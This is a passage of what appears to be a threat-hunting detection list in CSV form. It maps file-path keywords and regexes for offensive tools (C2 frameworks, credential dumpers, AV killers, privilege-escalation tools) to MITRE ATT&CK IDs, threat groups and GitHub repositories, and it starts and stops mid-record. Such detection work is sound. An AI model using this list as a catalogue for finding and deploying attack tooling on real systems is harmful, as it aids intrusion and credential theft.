T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/GetNPUsers.py*",".{0,1000}\/GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/Get-OSTokenInformation.ps1*",".{0,1000}\/Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/GetPasswords.ps1*",".{0,1000}\/GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/Get-ScheduledTaskComHandler.ps1*",".{0,1000}\/Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/get-shucking.php*",".{0,1000}\/get\-shucking\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*/getST.py*",".{0,1000}\/getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/get-system/getsystem.c*",".{0,1000}\/get\-system\/getsystem\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Get-TGSCipher.ps1*",".{0,1000}\/Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/GetWebDAVStatus_BOF/*",".{0,1000}\/GetWebDAVStatus_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*/ghauri.git*",".{0,1000}\/ghauri\.git.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/ghauri.py*",".{0,1000}\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/ghauri/ghauri/*",".{0,1000}\/ghauri\/ghauri\/.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/ghidra*",".{0,1000}\/ghidra.{0,1000}","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. 
along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","47772","5541","2024-04-30T18:05:15Z","2019-03-01T03:27:48Z" "*/GhostDriver.exe*",".{0,1000}\/GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*/GhostDriver.git*",".{0,1000}\/GhostDriver\.git.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*/ghostdriver.sys*",".{0,1000}\/ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*/ghostfile.aspx*",".{0,1000}\/ghostfile\.aspx.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" 
"*/GhostInTheNet.git*",".{0,1000}\/GhostInTheNet\.git.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet.sh*",".{0,1000}\/GhostInTheNet\.sh.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet-master*",".{0,1000}\/GhostInTheNet\-master.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostMapper.git*",".{0,1000}\/GhostMapper\.git.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*/GhostMapper.sln*",".{0,1000}\/GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*/GhostTask.git*",".{0,1000}\/GhostTask\.git.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*/gimmeSH.sh*",".{0,1000}\/gimmeSH\.sh.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","183","29","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*/giop-info.nse*",".{0,1000}\/giop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GithubC2.git*",".{0,1000}\/GithubC2\.git.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*/gkrellm-info.nse*",".{0,1000}\/gkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/glit.git*",".{0,1000}\/glit\.git.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*/glit-cli*",".{0,1000}\/glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*/glit-core*",".{0,1000}\/glit\-core.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - 
T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*/globeimposter.profile*",".{0,1000}\/globeimposter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/gmailC2.exe*",".{0,1000}\/gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" 
"*/gMSA_dump_*.txt*",".{0,1000}\/gMSA_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/gMSADumper*",".{0,1000}\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "*/GMSAPasswordReader.exe*",".{0,1000}\/GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/GMSAPasswordReader.git*",".{0,1000}\/GMSAPasswordReader\.git.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*/gobuster.git*",".{0,1000}\/gobuster\.git.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobuster/*",".{0,1000}\/gobuster\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobusterdir/*",".{0,1000}\/gobusterdir\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written 
in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobusterdns/*",".{0,1000}\/gobusterdns\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobustergcs/*",".{0,1000}\/gobustergcs\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gocrack.git*",".{0,1000}\/gocrack\.git.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack/.hashcat*",".{0,1000}\/gocrack\/\.hashcat.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack/server*",".{0,1000}\/gocrack\/server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - 
TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack_server*",".{0,1000}\/gocrack_server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack_worker*",".{0,1000}\/gocrack_worker.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack-1.0.zip*",".{0,1000}\/gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/goDoH.git*",".{0,1000}\/goDoH\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/godoh.git*",".{0,1000}\/godoh\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. 
Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/godoh/*",".{0,1000}\/godoh\/.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/goDoH/releases*",".{0,1000}\/goDoH\/releases.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/godoh-master.zip*",".{0,1000}\/godoh\-master\.zip.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/GodPotato.git*",".{0,1000}\/GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*/GoFetch.git*",".{0,1000}\/GoFetch\.git.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*/golang_c2.git*",".{0,1000}\/golang_c2\.git.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*/GoldenGMSA.git*",".{0,1000}\/GoldenGMSA\.git.{0,1000}","offensive_tool_keyword","GoldenGMSA","GoldenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential 
